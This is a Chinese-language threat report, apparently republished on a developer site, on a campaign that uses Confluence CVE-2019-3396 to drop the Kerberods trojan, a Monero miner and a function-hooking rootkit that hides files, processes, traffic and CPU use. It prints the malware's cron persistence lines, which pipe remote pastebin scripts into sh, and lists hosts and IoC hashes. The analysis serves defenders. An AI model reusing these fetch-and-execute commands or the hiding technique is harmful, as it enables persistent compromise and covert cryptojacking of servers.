内容简介:概述Confluence是一个广泛使用的协作与规划软件。在2019年3月,Atlassian发布了一份咨询报告,涉及到两个Confluence的关键漏洞。4月,我们观察到其中一个漏洞,即工具连接器漏洞CVE-2019-3396被威胁参与者恶意利用以执行恶意攻击。安全提供商Alert Logic还发现该漏洞被利用于投放Gandcrab勒索软件。上述这些事件,应该不会是我们最后一次发现CVE-2019-3396的开发利用事件,因为威胁行为者仍然在寻找利用此漏洞的新方法。我们发现,该漏洞还被利用于提供一个加密货币
概述
Confluence是一个广泛使用的协作与规划软件。在2019年3月,Atlassian发布了一份咨询报告,涉及到两个Confluence的关键漏洞。4月,我们观察到其中一个漏洞,即 工具 连接器漏洞CVE-2019-3396被威胁参与者恶意利用以执行恶意攻击。安全提供商Alert Logic还发现该漏洞被利用于投放Gandcrab勒索软件。
上述这些事件,应该不会是我们最后一次发现CVE-2019-3396的开发利用事件,因为威胁行为者仍然在寻找利用此漏洞的新方法。我们发现,该漏洞还被利用于提供一个加密货币挖掘的恶意软件,其中包含一个旨在隐藏其活动的Rootkit。这种技术很容易让我们联想到2018年11月发生的另一起使用挖矿工具+Rootkit组合的攻击。
投放和传播
该恶意活动的感染链如下:
在攻击开始时,首先发送一个远程命令,从Pastebin下载 Shell 脚本(hxxps://pastebin[.]com/MjGrx7EA)。
该Shell脚本会终止某些进程,然后从另一个Pastebin(hxxps://pastebin[.]com/CvJM3qz5)下载并执行lsd_1文件。该文件是第二个Shell脚本,它会投放第三个Shell脚本lsd_2,该脚本来自另一个Pastebin(hxxps://pastebin[.]com/a3EAddwq)。
这一Shell脚本负责从下面的服务器中,下载木马程序:
gwjyhs[.]com img[.]sobot[.]com
恶意软件Kerberods(检测为Trojan.Linux.KERBERDS.A)是一个自定义打包的二进制文件,该恶意软件会通过cron任务来自行安装:
*/10* * * * curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh */15* * * * wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh */10* * * * root curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh */15* * * * root wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh */15* * * * (curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wget -q -O-hxxps://pastebin[.]com/raw/rPB8eDpu)|sh
Kerberods负责投放加密货币挖掘工具(khugepageds,检测为Coinminer.Linux.MALXMR.UWEJI)及Rootkit组件。
在这里,有一个非常值得关注的地方,就是二进制文件投放Rootkit的方式。首先,它将Rootkit的代码写入名为/usr/local/lib/{random filename}.c的文件中。
然后,通过gcc编译Rootkit,输出二进制文件到/usr/local/lib/{random filename}.so。
编译Rootkit代码:
Kerberods还有多种传播方式,比如利用CVE-2019-1003001和CVE-2019-1003000漏洞通过SSH方式传播。
至于khugepageds,它是一个XMRig 2.14.1-mo1 门罗币(Monero)挖矿工具,该挖矿的配置信息以硬编码的形式保存到二进制文件中:
挖矿工具的配置:
我们可以在systemten[.]org:51640访问该挖矿工具所使用的矿池。
使用Rootkit逃避检测
如前文所述,此次攻击与去年发生的攻击事件具有许多相同的特征,例如:都使用了Pastebin作为C&C服务器、挖矿Payload相同、使用Rootkit来隐藏恶意软件。
与Kerberods一样,挖矿工具Payload也是用自定义加壳工具来防止安全研究人员的分析。
与仅对readdir函数进行挂钩从而隐藏挖矿进程的旧版本Rootkit不同,新版本对更多函数进行了挂钩。在新版本中,不仅隐藏了挖矿进程,还隐藏了某些文件和网络流量。除此之外,还能够伪造主机的CPU使用率。
新版本恶意软件挂钩的函数包括:
fopen、fopen64、lstat、lxstat、open、rmdir、stat、stat64、__xstat、__xstat64、unlink、unlinkat、opendir、readdir、readdir6。
如果它们的参数中包含诸如rootkit、miner或ld.so.preload这样的文件名,那么大多数挂钩函数都会返回“No such file or directory error”(无此类文件或目录错误)。
被挂钩的函数返回错误,以隐藏恶意软件感染的迹象:
下图展示了加载Rootkit时和未加载Rootkit时的htop系统监控输出。我们可以重点关注加载Rootkit后如何隐藏CPU使用率和挖矿过程。
下图为htop系统监控工具的输出,左图为未加载Rootkit时,右图为加载Rootkit时:
下图为netstat的输出,左图为未加载Rootkit时,右图为加载Rootkit时:
下图为伪造CPU使用率和TCP连接的函数:
伪造网络流量:
伪造CPU使用率:
Rootkit还将挂钩访问函数作为一种持久化的方式,以便创建一个cron任务,从而在该任务被调用时重新安装恶意软件。
下图展示了用于下载和执行Kerberods的cron任务代码:
安全建议和解决方案
在很短的时间内,我们就已经看到了多起利用CVE-2019-3396的实际攻击事件。这表明网络犯罪分子致力于(并且能够)以多种方式滥用当前最新的漏洞。因此,作为防御者,更应该开展持续监控,以检测组织中存在的任何威胁。
为了进行有效地监控,组织可以使用混合云安全解决方案,该解决方案可以针对DevOps提供强大、简单和自动化的安全保障。此外,该方案中还具有多种威胁防御技术,用于保护物理主机、虚拟主机和云主机。借助一些服务器深度安全防护系统,可以帮助DevOps和安全团队在预运行和运行时扫描容器映像,并确保其安全性。
该恶意活动的检测规则为:
·Atlassian Confluence服务器远程执行代码漏洞(CVE-2019-3396)
IoC
kerberods(加密货币挖掘二进制文件)
· SHA-256:a9228b6a3fe0b8375d6b881626fd4b59fbbf54dbd60a94b085ee0455b3d18fe9
· 检测名称:Trojan.Linux.KERBERDS.A
Khugepageds(加密货币挖掘恶意软件)
· SHA-256:25064a5ab78cdd36e7049d00b9319222906dd634908c1858e2262bf333631213
· 检测名称:Coinminer.Linux.MALXMR.UWEJI
random.so(Rootkit)
· SHA-256:3392589c9ebbf7600035574e338d69625cd5ce83ee655582fe8bbadb663532b3
· 检测名称:Rootkit.Linux.KERBERDS.A
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 黑客已经开始利用WinRAR漏洞传播恶意软件
- 首个完整利用WinRAR漏洞传播的恶意样本分析
- 新的Windows 10 0day漏洞被黑客恶意公开
- 恶意软件也有漏洞,Mirai C2奔溃分析
- WhatsApp存在0day漏洞可被利用安装恶意应用
- macOS被爆安全漏洞:可轻松绕过门禁功能安装恶意程序
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
细节决定交互设计的成败
张亮 / 2009-3 / 49.00元
《细节决定交互设计的成败》是一本非常实用的有关软件界面的交互设计和可用性设计方面知识的书籍,通过采用一问一答的形式,你将会有针对性地学习到一些能够很快应用在自己软件开发工作中的细节知识和诀窍。例如,如何减轻用户的等待感,如何预防和减少用户的使用错误等。另外,你会发现阅读《细节决定交互设计的成败》时会非常轻松和愉悦;这是由于《细节决定交互设计的成败》写作上的两个特点:第一,采用较多日常生活中的例子来......一起来看看 《细节决定交互设计的成败》 这本书的介绍吧!